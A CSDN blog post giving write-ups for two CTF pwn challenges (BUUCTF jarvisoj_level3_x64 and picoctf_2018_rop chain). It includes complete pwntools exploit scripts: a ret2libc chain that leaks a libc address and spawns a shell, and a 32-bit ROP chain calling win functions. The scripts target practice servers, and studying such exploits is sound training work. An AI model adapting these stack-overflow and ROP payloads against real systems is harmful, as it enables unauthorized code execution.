【BUUCTF】jarvisoj_level3_x64,picoctf_2018_rop chain

最新推荐文章于 2023-05-14 20:33:37 发布
最新推荐文章于 2023-05-14 20:33:37 发布
阅读量191 收藏
点赞数
分类专栏: PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51251108/article/details/111977699
版权

【BUUCTF】jarvisoj_level3_x64

ROPgadget缺了rdx,对应的是输出的长度,要大于8
gdb调试可以看到rdx的值是0x200,足够大,不用管了
在这里插入图片描述

from pwn import*
r=remote('node3.buuoj.cn',29628)
libc=ELF('./libc-2.23.so')
elf=ELF('./level3_x64')
context.log_level = 'debug'
context.arch = elf.arch
pop_rdi=0x4006b3
pop_rsi_r15=0x4006b1
pd1='a'*0x88
pd1+=p64(pop_rdi)+p64(1)+p64(pop_rsi_r15)+p64(elf.got['write'])+'a'*8
pd1+=p64(elf.sym['write'])+p64(elf.sym['main'])
r.recvuntil('Input:\n')
r.send(pd1)
true=u64(r.recv(8))
print hex(true)
base=true-0xf72b0
print hex(base)
system=base+0x45390
binsh=base+0x18cd57
pd2='a'*0x88+p64(pop_rdi)+p64(binsh)+p64(system)
r.send(pd2)
r.interactive()

【BUUCTF】picoctf_2018_rop chain

from pwn import*
r=remote('node3.buuoj.cn',29901)
elf=ELF('./PicoCTF_2018_rop_chain')
libc=ELF('./libc-2.27.so')
context.log_level = 'debug'
win1=0x080485CB
win2=0x080485D8
flag=0x0804862B
pd1='a'*0x18+'bbbb'+p32(win1)+p32(win2)+p32(flag)+p32(0xBAAAAAAD)+p32(0xDEADBAAD)
r.sendline(pd1)
r.interactive()

0xBAAAAAAD是-1163220307对应的16进制的补码作为win2函数的参数
0xDEADBAAD是-559039827对应的16进制的补码作为flag函数的参数

Nq0inaen
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTFjarvisoj_level3_x64(write up)
qq_44768749的博客
08-24 879
BUUCTFjarvisoj_level3_x640x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 64位程序,仅开启栈不可执行保护 0x02 运行 输入一个字符串 0x03 IDA 字符串可输入长度可造成栈溢出 0x04 思路 没有提供system函数和"/bin/sh"的地址 第一次栈溢出泄露read函数地址来得到libc版本,从而获取system函数和"/bin/sh"的地址,并且返回主函数 这里有个难点就是参数需要放到对应
BUUCTF jarvisoj_level3
红叶的博客
10-27 327
切入点从泄露write函数入手。栈溢出漏洞,ret2libc。IDA Pro 静态调试。
jarvisoj_level3_x64
m0sway的博客
11-26 587
jarvisoj_level3_x64 使用checksec查看: 只开启了栈不可执行,应该是jarvisoj_level3的x64版本,直接放进IDA中看吧: 主函数中直接给出了漏洞函数,跟进查看: read()函数,存在栈溢出,和jarvisoj_level3的主要区别在栈上传参和寄存器传参。 exp: from pwn import * #start # r = process("../buu/jarvisoj_level3_x64") r = remote("node4.buuoj.cn",
BUUCTF--pwn--jarvisoj_level3_x64【ret2libc_64】
qq_73149934的博客
12-05 560
BUUCTF--pwn--jarvisoj_level3_x64
rop-sample.rar_.comrop_rop_rop源码下载_taobao netty
09-20
《ROP技术解析与Netty应用实战》 ROP(Return-Oriented Programming,返回导向编程)是一种高级的利用技术,常用于安全领域,特别是在软件漏洞利用中。ROP允许攻击者通过跳转到现有代码片段(通常称为“gadgets”)...
arm64_rop_exploit:Arm64返回定向编程(ROP)漏洞
03-02
arm64_rop_exploit arm64 rop小工具二进制文件,用于将arm64反向外壳程序代码映射到内存中并执行代码这仅适用于目标arm64设备。 用于将rop小工具映射到内存中并从libc库执行shell代码的源代码。 在运行Ubuntu 18.04....
Anfiscontrollerdoubleinvertedpendulum.rar_ANFIS_anfis matlab_fuz
07-15
1. "rop.fis"和"fis1.fis":这些可能是定义模糊推理系统的文件,包含了规则集和参数,可能用于调整ANFIS控制器的行为。 2. "checkdata.m":这是一个MATLAB脚本,可能用于验证或测试模型的性能,可能包含数据的预处理...
Rops.rar_The Conversion_rops
09-22
Note that this rop-form instruction has no dex-form equivilent and must be removed before the dex conversion.
精选_使用BitBlt函数实现绘制透明位图_源码打包
03-09
2. 设置颜色键:如果要使用颜色键透明,可以使用`SetBkColor()`函数设置源DC的背景色为透明色,然后在调用BitBlt时使用`SRCCOPY`与`ROP2`常量,这样源DC中所有匹配背景色的像素都不会被复制。 3. 使用BitBlt进行...
JarvisOJ level3_x64
PLpa的博客
07-09 998
这题和level3大同小异,只不过这一题是x64的程序 做这题之前,建议先写level2。 拿到这题,我们首先查看保护: 程序只开了NX保护,好的。 根据做过level3的经验,我们先找出我们需要的地址(也可以用pwntools工具自动找): vul()函数: write()函数的plt地址: 之后我们找齐需要用的gadget: 但是我们并没有找到pop rdx ; ret,根据我们对w...
[BUUCTF]PWN——jarvisoj_level3_x64
BangSen1的博客
03-17 234
jarvisoj_level3_x64 例行检查,64位,开启NX保护。 运行一下。 IDA打开,查看main函数 function()函数 buf溢出漏洞,read之前已经调用过write函数,利用它来泄露libc版本 64位程序在传参的时候要先用到rdi,rsi,rdx,rcx,r8,r9这几个寄存器,都满了之后才会在栈上传参 利用ROPgadget找一下设置寄存器的指令 rdi=0x4006b3 rsi_r15=0x4006b1 payload='a'*(0x80+8)+p64(rdi)+
BUUCTF(pwn)jarvisoj_level3_x64
半岛铁盒的博客
04-01 431
这道题是一道简单的rop类型的题目,跟之前做的题目有一些差异:( 这是64位的需要一些额外的操作 ) 64位汇编传参,当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。 当参数为7个以上时, 前 6 个与前面一样, 但后面的依次从 “右向左” 放入栈中,即和32位汇编一样。 这里我们使用 write 函数 来泄密 libc地址 ssize_t write(int fd,const void*buf,size_t count); 参数说明: f.
BUUCTF----jarvisoj_level3_x64
qq_33010875的博客
09-26 455
环境:WSL2,ubuntu16.04,python2 checksec文件: 这道题level3的思路一样,只是32位的程序改成了64位。 也就是说,在利用write函数泄露出libc的基地址时,需要用到寄存器来穿参数,write有三个参数,所以需要rdi,rsi,rdx三个寄存器,通过命令: ROPgadget --binary level3_x64 |grep "pop" 结果: 从图中可以看到只找到了rdi和rsi寄存器,没有rdx寄存器 尝试gdb程序: 在read函数下断点,可以看到rd
Jarvis OJlevel3_x64_通用ROP
Jc
07-13 307
解题思路 1. 查看文件信息,安全机制 2. 代码审计 3. 分析漏洞点 4. 编写EXP 1.基本信息 安全机制 2.代码审计 3.漏洞分析 1.程序无system和bin/sh,并且是个64位的,我们不能进行往栈里面写入数据 2.64位汇编 当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。 当参数为7个以上时, 前 6 个与前面一样,...
buuctf jarvisoj_level3_x641
最新发布
qq_73625550的博客
05-14 487
ret2libc,利用libcsearcher获取libc版本
picoctf_2018_rop chain
03-16
picoctf_2018_rop chain是一道CTF比赛中的题目,需要使用ROP(Return Oriented Programming)技术来解决。ROP是一种利用程序中已有的代码段(称为gadget)来构造攻击代码的技术,通过将多个gadget串联起来,可以实现...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值